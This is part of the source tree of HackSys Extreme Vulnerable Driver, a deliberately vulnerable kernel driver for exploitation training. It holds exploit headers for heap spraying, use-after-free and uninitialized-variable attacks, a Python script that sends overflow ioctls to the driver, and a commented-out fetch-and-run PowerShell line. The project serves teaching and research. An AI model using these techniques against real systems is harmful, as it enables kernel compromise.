13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UninitializedHeapVariable.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Uninitialized Heap Variable Vulnerability
48 | implemented in HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
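#ifndef __UNINITIALIZED_HEAP_VARIABLE_H__
#define __UNINITIALIZED_HEAP_VARIABLE_H__

#pragma once

#include "Common.h"

/*
 * Tunables for the uninitialized heap variable exploit. Their exact use is
 * in UninitializedHeapVariable.c; from the prototypes below they presumably
 * size the object name that carries the payload trampoline and bound the
 * number of chunks fed into the lookaside list.
 */
#define MAX_OBJECT_NAME_LENGTH    0xF0
#define MAX_CHUNKS_IN_LAL_BUCKET  256
#define UNICODE_TERMINATOR_LENGTH 0x4

/*
 * Prototypes. The parameterless routines are declared as (VOID): in C an
 * empty parameter list means "unspecified arguments" (pre-C23), which turns
 * off argument checking at every call site. (VOID) restores it and remains
 * compatible with a definition written as `VOID Name()` in the .c file.
 */

/* Blocks until the targeted lookaside list is active (mechanism in the .c). */
VOID WaitForLookAsideListActivation(VOID);

/* Feeds chunks carrying Payload into the lookaside list. */
VOID PopulateLookAsideList(PVOID Payload);

/*
 * Worker routine that drives the exploit.
 * Signature is LPTHREAD_START_ROUTINE-compatible (DWORD WINAPI f(LPVOID)).
 */
DWORD WINAPI UninitializedHeapVariableThread(LPVOID Parameter);

/*
 * Fills Name (Length bytes available) with an object name that embeds a
 * trampoline to Pivot. Caller owns the buffer and must size it for Length.
 */
VOID GenerateObjectNameWithPayloadTrampoline(UCHAR Name[], UINT32 Length, ULONG_PTR Pivot);

#endif /* __UNINITIALIZED_HEAP_VARIABLE_H__ */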
69 |
--------------------------------------------------------------------------------
/Exploit/UninitializedStackVariable.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UninitializedStackVariable.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Uninitialized Stack Variable Vulnerability
48 | implemented in HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
#ifndef __UNINITIALIZED_STACK_VARIABLE_H__
#define __UNINITIALIZED_STACK_VARIABLE_H__

#pragma once

#include "Common.h"

/*
 * Worker routine that drives the uninitialized stack variable exploit.
 * Signature is LPTHREAD_START_ROUTINE-compatible (DWORD WINAPI f(LPVOID));
 * Parameter is whatever context the creating thread passes through.
 */
DWORD WINAPI UninitializedStackVariableThread(LPVOID Parameter);

#endif /* __UNINITIALIZED_STACK_VARIABLE_H__ */
62 |
--------------------------------------------------------------------------------
/Exploit/UseAfterFree.h:
--------------------------------------------------------------------------------
1 | /*++
2 |
3 | ## ## ######## ## ## ########
4 | ## ## ## ## ## ## ##
5 | ## ## ## ## ## ## ##
6 | ######### ###### ## ## ## ##
7 | ## ## ## ## ## ## ##
8 | ## ## ## ## ## ## ##
9 | ## ## ######## ### ########
10 |
11 | HackSys Extreme Vulnerable Driver Exploit
12 |
13 | Author : Ashfaq Ansari
14 | Contact: ashfaq[at]hacksys[dot]io
15 | Website: https://hacksys.io/
16 |
17 | Copyright (C) 2021-2023 HackSys Inc. All rights reserved.
18 | Copyright (C) 2015-2020 Payatu Software Labs LLP. All rights reserved.
19 |
20 | This program is free software: you can redistribute it and/or modify it under the terms of
21 | the GNU General Public License as published by the Free Software Foundation, either version
22 | 3 of the License, or (at your option) any later version.
23 |
24 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
25 | without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
26 | See the GNU General Public License for more details.
27 |
28 | You should have received a copy of the GNU General Public License along with this program.
29 | If not, see .
30 |
31 | THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
32 | LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
33 | ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT,
34 | INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
35 | TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
36 | INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
37 | LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38 | THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39 |
40 | See the file 'LICENSE' for complete copying permission.
41 |
42 | Module Name:
43 | UseAfterFree.h
44 |
45 | Abstract:
46 | This module implements the data structures used by the
47 | exploit for Use After Free Vulnerability implemented in
48 | HackSys Extreme Vulnerable Driver.
49 |
50 | --*/
51 |
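#ifndef __USE_AFTER_FREE_H__
#define __USE_AFTER_FREE_H__

#pragma once

#include "Common.h"

/*
 * Object-type selector used when allocating the reserve objects the pool
 * spray is built from (presumably; the allocation call lives in
 * UseAfterFree.c).
 */
#define IO_COMPLETION_OBJECT 1

/*
 * Stand-in for the freed kernel object. 0x58 bytes is presumably chosen to
 * match the size of the driver's UAF object so the fake lands in the same
 * pool bucket; it must track the driver-side structure.
 */
typedef struct _FAKE_OBJECT {
    CHAR buffer[0x58];
} FAKE_OBJECT, *PFAKE_OBJECT;

/*
 * NOTE(review): these are tentative *definitions*, not extern declarations,
 * placed in a header. That is only safe while exactly one translation unit
 * includes this header; a second includer duplicates the symbols (typically
 * LNK2005 on MSVC, a multiple-definition error on GCC >= 10). The clean fix
 * is `extern HANDLE ReserveObjectArrayA[10000];` here plus one definition
 * in UseAfterFree.c; left as-is because that .c file is outside this view.
 */
HANDLE ReserveObjectArrayA[10000];
HANDLE ReserveObjectArrayB[5000];

/*
 * Prototypes. The parameterless routines are declared as (VOID): in C an
 * empty parameter list means "unspecified arguments" (pre-C23), which turns
 * off argument checking at every call site. (VOID) restores it and remains
 * compatible with a definition written as `VOID Name()` in the .c file.
 */

/* Allocates reserve objects into the arrays above to groom the pool. */
VOID SprayNonPagedPoolWithReserveObjects(VOID);

/* Closes a subset of the sprayed handles to punch holes into the pool. */
VOID CreateHolesInNonPagedPoolByClosingReserveObjects(VOID);

/* Releases whatever reserve objects are still held. */
VOID FreeReserveObjects(VOID);

/*
 * Worker routine that drives the exploit.
 * Signature is LPTHREAD_START_ROUTINE-compatible (DWORD WINAPI f(LPVOID)).
 */
DWORD WINAPI UseAfterFreeThread(LPVOID Parameter);

#endif /* __USE_AFTER_FREE_H__ */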
74 |
--------------------------------------------------------------------------------
/Exploit/arg.h:
--------------------------------------------------------------------------------
#ifndef __ARG_H__
#define __ARG_H__

/*
 * Minimal suckless-style command-line option parser.
 *
 * Intended use inside main(), which must have parameters named exactly
 * `argc` and `argv` because the macros reference those identifiers:
 *
 *     ARGBEGIN {
 *     case 'v': verbose = 1; break;
 *     case 'o': outfile = EARGF(usage()); break;
 *     default:  usage();
 *     } ARGEND
 *
 * Options are single characters and may be bundled ("-abc"). Parsing stops
 * at "--" (which is consumed) or at the first argv entry that is not '-'
 * followed by at least one more character, so a lone "-" is treated as an
 * operand. After ARGEND, argc/argv describe the remaining operands only.
 *
 * The includer must define `char *argv0;` (ARGBEGIN stores the program
 * name in it) and must include <stdlib.h> itself: EARGF() calls abort() and
 * this header includes nothing.
 */

/* Program name, set by ARGBEGIN from argv[0]; defined by the includer. */
extern char *argv0;

/* Marks a value as deliberately unused to silence compiler warnings. */
#define USED(x) ((void)(x))

/*
 * Opens the option loop. Inside the block `_argc` is the current option
 * character (see ARGC()); `brk` is set by ARGF()/EARGF() once the rest of
 * the current word was consumed as an argument, and `_argv` detects that
 * ARGF()/EARGF() advanced argv to take the following word. Either case
 * ends the scan of the current bundle.
 */
#define ARGBEGIN for (argv0 = *argv, argv++, argc--;\
        argv[0] && argv[0][1]\
        && argv[0][0] == '-';\
        argc--, argv++) {\
    char _argc;\
    char **_argv;\
    int brk;\
    if (argv[0][1] == '-' && argv[0][2] == '\0') {\
        argv++;\
        argc--;\
        break;\
    }\
    for (brk = 0, argv[0]++, _argv = argv;\
        argv[0][0] && !brk;\
        argv[0]++) {\
        if (_argv != argv)\
            break;\
        _argc = argv[0][0];\
        switch (_argc)

/*
 * Closes the option loop opened by ARGBEGIN. The USED() calls keep the
 * compiler quiet when the body never touches `_argc`, `argv` or `argc`.
 */
#define ARGEND }\
    USED(_argc);\
    }\
    USED(argv);\
    USED(argc);

/* The option character currently being handled. */
#define ARGC() _argc

/*
 * Option argument, mandatory: the remainder of the current word ("-ofile")
 * or, if the word is exhausted, the next argv entry. When neither exists,
 * evaluates x (typically a usage() that exits) and then abort()s. Sets
 * `brk` so ARGBEGIN stops scanning the current bundle.
 */
#define EARGF(x) ((argv[0][1] == '\0' && argv[1] == NULL)?\
    ((x), abort(), (char *)0) :\
    (brk = 1, (argv[0][1] != '\0')?\
    (&argv[0][1]) :\
    (argc--, argv++, argv[0])))

/* Option argument, optional: as EARGF() but yields NULL when missing. */
#define ARGF() ((argv[0][1] == '\0' && argv[1] == NULL)?\
    (char *)0 :\
    (brk = 1, (argv[0][1] != '\0')?\
    (&argv[0][1]) :\
    (argc--, argv++, argv[0])))

#endif //__ARG_H__
49 |
--------------------------------------------------------------------------------
/Screenshots/hevd-banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-banner.png
--------------------------------------------------------------------------------
/Screenshots/hevd-debug-print.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-debug-print.png
--------------------------------------------------------------------------------
/Screenshots/hevd-exploitation.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-exploitation.png
--------------------------------------------------------------------------------
/Screenshots/hevd-help.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-help.png
--------------------------------------------------------------------------------
/Screenshots/hevd-linux-banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-linux-banner.png
--------------------------------------------------------------------------------
/Screenshots/hevd-linux-install-uninstall.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-linux-install-uninstall.png
--------------------------------------------------------------------------------
/Screenshots/hevd-linux-ioctl-log.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-linux-ioctl-log.png
--------------------------------------------------------------------------------
/Screenshots/hevd-linux-ioctl-tests.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Screenshots/hevd-linux-ioctl-tests.png
--------------------------------------------------------------------------------
/Tools/hevd_linux_installer.sh:
--------------------------------------------------------------------------------
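#!/usr/bin/env bash

# Load ("install") or unload ("uninstall") the vulnerable Linux build of HEVD.
#
# Run this only inside a throw-away VM: the module is deliberately
# exploitable, and "install" makes its device node world-readable/writable,
# which hands every local user a kernel memory-corruption primitive.

if [ "$#" -ne 1 ]; then
    echo "❗ Usage: $0 {install|uninstall}"
    exit 1
fi

# Locate the build tree relative to this script instead of the caller's
# working directory, so the tool works from any cwd (invoking it from Tools/
# gives the same paths as before).
SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
BUILD_ARCH=x64
PROJECT_NAME=hevd
PROJECT_ROOT="$(readlink -f "${SCRIPT_DIR}/..")"
BUILD_DIR="${PROJECT_ROOT}/build/driver/linux/vulnerable/${BUILD_ARCH}"
MODULE_PATH="${BUILD_DIR}/${PROJECT_NAME}.ko"
HEVD_DEVICE_PATH="/dev/HackSysExtremeVulnerableDriver"
# Upper bound on how long to wait for the device node after insmod
# (steps of 0.5 s).
DEVICE_WAIT_STEPS=20

# insmod/rmmod require root
if [ "$(id -u)" != "0" ]; then
    echo "🚫 This script must be run as root"
    exit 1
fi

case "$1" in
    install)
        # The .ko is only needed for loading; uninstall must keep working
        # after the build directory has been cleaned.
        if [ ! -f "${MODULE_PATH}" ]; then
            echo "🔍 Kernel module not found: ${MODULE_PATH}"
            exit 1
        fi

        if ! insmod "${MODULE_PATH}"; then
            echo "❌ Failed to load kernel module: ${MODULE_PATH}"
            exit 1
        fi
        echo "✅ Kernel module loaded successfully"

        # The device node shows up asynchronously after the module registers
        # itself; poll for it instead of a fixed one-second sleep so a slow VM
        # does not chmod a node that is not there yet (which previously failed
        # silently while still printing "Permissions updated").
        step=0
        while [ ! -e "${HEVD_DEVICE_PATH}" ] && [ "${step}" -lt "${DEVICE_WAIT_STEPS}" ]; do
            sleep 0.5
            step=$((step + 1))
        done
        if [ ! -e "${HEVD_DEVICE_PATH}" ]; then
            echo "❌ Device node did not appear: ${HEVD_DEVICE_PATH}"
            exit 1
        fi

        # Intentionally world-accessible: the exploit tests run unprivileged.
        chmod a+rw "${HEVD_DEVICE_PATH}"
        echo "🔒 Permissions updated: ${HEVD_DEVICE_PATH}"
        ;;
    uninstall|remove)
        if ! rmmod "${PROJECT_NAME}"; then
            echo "❌ Failed to unload kernel module: ${PROJECT_NAME}"
            exit 1
        fi
        echo "✅ Kernel module unloaded successfully"
        ;;
    *)
        echo "❗ Invalid option: $1"
        echo "❗ Usage: $0 {install|uninstall}"
        exit 1
        ;;
esac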
61 |
--------------------------------------------------------------------------------
/Tools/hevd_linux_tests.py:
--------------------------------------------------------------------------------
1 | import ctypes
2 | import fcntl
3 | import os
4 |
5 |
# ioctl request-number encoding in the classic BSD layout: direction in
# bits 31-30, argument size (13 bits) in bits 28-16, group/type byte in
# bits 15-8 and the command number in bits 7-0. On x86-64 Linux this should
# produce the same numbers as the kernel's _IOWR() for argument sizes below
# 0x2000 (Linux reserves 14 size bits), which covers the 32-byte HEVD_IO
# used here; larger arguments would be masked differently.
IOCPARM_MASK = 0x1fff
IOC_OUT = 0x40000000
IOC_IN = 0x80000000
IOC_INOUT = IOC_IN | IOC_OUT


def _IOC(inout, group, number, len):
    """Pack direction, argument size, group byte and command into one request number.

    `len` shadows the builtin; the parameter name is kept so existing
    keyword callers keep working.
    """
    size_bits = (len & IOCPARM_MASK) << 16
    group_bits = group << 8
    return inout | size_bits | group_bits | number


def _IOWR(group, number, type):
    """Read/write request for a ctypes `type` argument in single-character `group`."""
    argument_size = ctypes.sizeof(type)
    return _IOC(IOC_INOUT, ord(group), number, argument_size)


class HEVD_IO(ctypes.Structure):
    """Argument block handed to every HEVD ioctl.

    Two (address, byte-count) pairs with natural alignment, so the
    structure is 4 * sizeof(void *) bytes (32 on x86-64). Its layout must
    match the driver's definition. The pointers are raw addresses: whatever
    they reference has to stay alive for the duration of the ioctl.
    """
    _fields_ = [
        ("input_buffer", ctypes.c_void_p),          # input pair: address ...
        ("input_buffer_length", ctypes.c_size_t),   # ... and byte count
        ("output_buffer", ctypes.c_void_p),         # output pair: address ...
        ("output_buffer_length", ctypes.c_size_t),  # ... and byte count
    ]


def IOCTL(number):
    """Request number for HEVD command `number`, i.e. _IOWR('h', number, HEVD_IO)."""
    return _IOWR('h', number, HEVD_IO)
30 |
31 |
DEVICE_PATH = "/dev/HackSysExtremeVulnerableDriver"  # node exposed by the Linux HEVD module

# IOCTL codes
# Command numbers 0..0xD; only the two uncommented ones are exercised below.
# The commented-out entries keep the numbering visible, but the Linux port
# presumably implements only a subset of the Windows handlers, so check the
# driver source before enabling one -- an unhandled number may just fail,
# a handled one is a deliberate crash trigger.
HEVD_IOCTL_BUFFER_OVERFLOW_STACK = IOCTL(0)
# HEVD_IOCTL_BUFFER_OVERFLOW_STACK_GS = IOCTL(1)
# HEVD_IOCTL_ARBITRARY_WRITE = IOCTL(2)
# HEVD_IOCTL_BUFFER_OVERFLOW_KERNEL_HEAP = IOCTL(3)
# HEVD_IOCTL_ALLOCATE_UAF_OBJECT_KERNEL_HEAP = IOCTL(4)
# HEVD_IOCTL_USE_UAF_OBJECT_KERNEL_HEAP = IOCTL(5)
# HEVD_IOCTL_FREE_UAF_OBJECT_KERNEL_HEAP = IOCTL(6)
# HEVD_IOCTL_ALLOCATE_FAKE_OBJECT_KERNEL_HEAP = IOCTL(7)
# HEVD_IOCTL_TYPE_CONFUSION = IOCTL(8)
HEVD_IOCTL_INTEGER_OVERFLOW = IOCTL(9)
# HEVD_IOCTL_NULL_POINTER_DEREFERENCE = IOCTL(0xA)
# HEVD_IOCTL_UNINITIALIZED_MEMORY_STACK = IOCTL(0xB)
# HEVD_IOCTL_UNINITIALIZED_MEMORY_KERNEL_HEAP = IOCTL(0xC)
# HEVD_IOCTL_DOUBLE_FETCH = IOCTL(0xD)
49 |
50 |
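def trigger_ioctl(ioctl, hevd_io):
    """Open the HEVD device, issue `ioctl` with `hevd_io` as argument and report the result.

    Args:
        ioctl: request number as produced by IOCTL().
        hevd_io: a HEVD_IO instance, passed to the kernel by buffer. Any
            addresses it holds must be kept alive by the caller until this
            function returns.

    Returns:
        True when the ioctl returned 0, False on a non-zero status or when
        the syscall failed with OSError (which is what fcntl.ioctl raises;
        a kernel crash caused by the driver never returns here at all).

    The descriptor is always closed: the previous version returned from
    inside the except clause and leaked it on every failed call.
    """
    device_fd = os.open(DEVICE_PATH, os.O_RDWR)
    try:
        status = fcntl.ioctl(device_fd, ioctl, hevd_io)
    except OSError as exc:
        print(f"💥 Exception in IOCTL: {exc}")
        return False
    finally:
        os.close(device_fd)

    if status == 0:
        print("✅ IOCTL executed successfully!")
        return True
    print(f"❌ Failed to execute IOCTL. Status code: {status}")
    return False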
66 |
67 |
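def _run_ioctl_test(name, ioctl, input_buffer_size):
    """Send `input_buffer_size` bytes of 'A' to the driver through `ioctl` and log the outcome.

    The ctypes buffer lives in this frame until trigger_ioctl() returns,
    which is as long as the kernel can legitimately read it during the
    call. Only the input pair of HEVD_IO is filled in; the output pair is
    left at zero, as the original test did. Returns trigger_ioctl()'s result.
    """
    print()
    print(f"🚀 Triggering: {name} - 0x{ioctl:X}")

    input_buffer_data = b"A" * input_buffer_size
    # create_string_buffer() appends a NUL, so the allocation is one byte
    # larger than the length handed to the driver.
    input_buffer = ctypes.create_string_buffer(input_buffer_data)

    user_hevd_io = HEVD_IO()
    user_hevd_io.input_buffer = ctypes.addressof(input_buffer)
    user_hevd_io.input_buffer_length = len(input_buffer_data)

    print(f"\t🔵 Input buffer: 0x{ctypes.addressof(input_buffer):X}")
    print(f"\t🔵 Input buffer length: 0x{input_buffer_size:X}")

    return trigger_ioctl(ioctl, user_hevd_io)


if __name__ == "__main__":
    print("🏆 HackSys Extreme Vulnerable Driver (HEVD) - Linux 🏆")

    # Each call is a deliberate crash trigger against a vulnerable driver;
    # the payload sizes are likely large enough to corrupt kernel state, so
    # run this in a disposable VM and expect an oops or panic.
    _run_ioctl_test("HEVD_IOCTL_BUFFER_OVERFLOW_STACK", HEVD_IOCTL_BUFFER_OVERFLOW_STACK, 0x1000)
    _run_ioctl_test("HEVD_IOCTL_INTEGER_OVERFLOW", HEVD_IOCTL_INTEGER_OVERFLOW, 0x800)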
103 |
--------------------------------------------------------------------------------
/Whitepaper/HackSys Extreme Vulnerable Driver.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Whitepaper/HackSys Extreme Vulnerable Driver.pptx
--------------------------------------------------------------------------------
/Whitepaper/HackSys_Extreme_Vulnerable_Driver_Whitepaper.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hacksysteam/HackSysExtremeVulnerableDriver/b1cc756e55f69530f6468a6c3c310ed7b967bada/Whitepaper/HackSys_Extreme_Vulnerable_Driver_Whitepaper.pdf
--------------------------------------------------------------------------------
/appveyor.yml:
--------------------------------------------------------------------------------
# HEVD appveyor configuration

#---------------------------------#
# general configuration #
#---------------------------------#

# version format
version: 3.0.{build}

# branches to build
branches:
  # whitelist
  only:
    - master

# Do not build on tags (GitHub and BitBucket)
skip_tags: true

# Do not build feature branch with open Pull Requests
# skip_branch_with_pr: true

# Maximum number of concurrent jobs for the project
max_jobs: 1

#---------------------------------#
# environment configuration #
#---------------------------------#

# Build worker image (VM template)
image:
  - Visual Studio 2017
  - Ubuntu

# fetch repository as zip archive
# default is "false"
shallow_clone: true

# set clone depth
# clone entire repository history if not defined
# (presumably a no-op while shallow_clone is true, since the repository then
# arrives as an archive rather than a git clone)
clone_depth: 1

# this is how to allow failing jobs in the matrix
# environment:
# matrix:
# - job_name: Build HEVD for Windows
# - job_name: Build HEVD for Linux
# job_depends_on: Build HEVD for Windows
# - job_name: Package HEVD
# job_depends_on: Build HEVD for Linux

matrix:
  fast_finish: true

# One build job per image; each runs the Builder script for its platform
# and zips the build/ tree into the artifact below.
for:
  - matrix:
      only:
        - image: Visual Studio 2017
    clone_folder: c:\projects\hevd
    build_script:
      - cmd: cd c:\projects\hevd\Builder
      - cmd: Build_HEVD_All.bat
    after_build:
      - cmd: 7z a c:\projects\hevd\HEVD.zip c:\projects\hevd\build\*

  - matrix:
      only:
        - image: Ubuntu
    clone_folder: /home/appveyor/projects/hevd
    build_script:
      - sh: cd /home/appveyor/projects/hevd/Builder
      - sh: sh Build_HEVD_All.sh
    after_build:
      - sh: 7z a /home/appveyor/projects/hevd/HEVD.zip /home/appveyor/projects/hevd/build/*

# disable test
test: off

# artifacts
# HEVD.zip holds deliberately vulnerable driver builds; treat it as lab
# material only, never install it outside a disposable VM.
artifacts:
  - path: HEVD.zip

# disable deployment
deploy: off


# remote desktop debugging
# NOTE(review): if this block is ever re-enabled, do not commit a password
# here -- use an AppVeyor "secure" variable -- and pin enable-rdp.ps1 to a
# commit SHA instead of `master`: `iex` executes whatever that URL serves at
# build time with the worker's privileges, which is a supply-chain hole.
# environment:
# APPVEYOR_RDP_PASSWORD: Passw0rd!

# on_finish:
# - ps: $blockRdp = $true; iex ((new-object net.webclient).DownloadString('https://raw.githubusercontent.com/appveyor/ci/master/scripts/enable-rdp.ps1'))
92 |
--------------------------------------------------------------------------------